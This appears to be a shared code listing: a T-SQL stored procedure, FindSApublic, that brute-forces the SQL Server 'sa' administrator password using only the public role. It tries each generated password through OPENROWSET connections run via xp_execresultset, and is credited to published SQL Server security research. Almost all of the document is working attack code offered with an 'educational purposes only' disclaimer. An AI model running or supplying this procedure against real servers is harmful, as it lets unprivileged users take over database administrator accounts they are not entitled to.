Find SA password with public role-perm test DBA

Find SA Password (Brute Force) with Public Role

FindSApublic is a brute-force password cracker that requires only public role.

Possibilities returns how many different passwords are possible with 1 up to c characters from a universe of n different characters.

Usage:

FindSApublic n

N is an integer which is the maximum length of the password to attempt cracking.

Acknowledgments
original idea:
David Litchfield
david@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you David, for sharing your report and allowing me to use it for my educational test code.
Highly recomended reading:
http://www.nextgenss.com/papers/cracking-sql-passwords.pdf

original idea and code:
Chris Anley
chris@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you Chris, for sharing your report and allowing me to use it for my educational test code.
Highly recomended reading:
http://www.nextgenss.com/papers/advanced_sql_injection.pdf

This code is provided as is and for educational purposes only.

Developed, adapted or translated to TSQL by Joseph Gama.

SET QUOTED_IDENTIFIER OFF GO SET ANSI_NULLS OFF GO CREATE function Possibilities (@c bigint, @n bigint) --returns how many different passwords are possible with 1 up to c characters from a universe --of n different characters returns bigint as BEGIN declare @i bigint, @result bigint set @i=1 set @result=0 while @i<=@c BEGIN set @result=@result+power(@n,@i) set @i=@i+1 END RETURN @result END GO SET QUOTED_IDENTIFIER OFF GO SET ANSI_NULLS ON GO SET QUOTED_IDENTIFIER OFF GO SET ANSI_NULLS OFF GO CREATE PROCEDURE FindSApublic (@size int) AS SET NOCOUNT ON DECLARE @query NVARCHAR(255),@i int,@j int,@n int,@max int,@temp int, @keys VARCHAR(50), @dtime datetime, @s VARCHAR(10), @t VARCHAR(10) SET @dtime=getdate() SET @keys='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!_' SET @max=test.dbo.Possibilities( @size, LEN(@keys)) SET @n=len(@keys) SET @s='A' SET @i=0 create table ##temppwd (pwd NVARCHAR(10)) WHILE @i<@max BEGIN SET @j=@i WHILE (@j>0) BEGIN SET @temp=@j % (@n)-sign(len(@s)) if @temp<0 set @temp=@n-1 SET @j=@j /(@n+sign(len(@s))) SET @s=substring(@keys,@temp+1,1)+@s SET @t=@s END print @s declare @s1 NVARCHAR(10) set @s1=CONVERT(NVARCHAR(10),@s) --set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' FROM OPENDATASOURCE(''''SQLOLEDB'''',''''Data Source='+@@SERVERNAME+N';User ID=sa;Password='+@s1+N''''').master.dbo.sysobjects ''' set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' from OPENROWSET(''''MSDASQL'''',''''DRIVER={SQL Server};SERVER=;uid=sa;pwd='+@s1+N''''',''''select 1 '''')''' exec master..xp_execresultset @query,N'master' if EXISTS(select * from ##temppwd) GOTO lblFound SET @s='' SET @i=@i+1 END drop table ##temppwd select 'Not found after '+str(@max)+' rounds, up to '+@t+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes' return lblFound: drop table ##temppwd select 'Found: '+@s+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes' return GO SET QUOTED_IDENTIFIER OFF GO SET ANSI_NULLS ON GO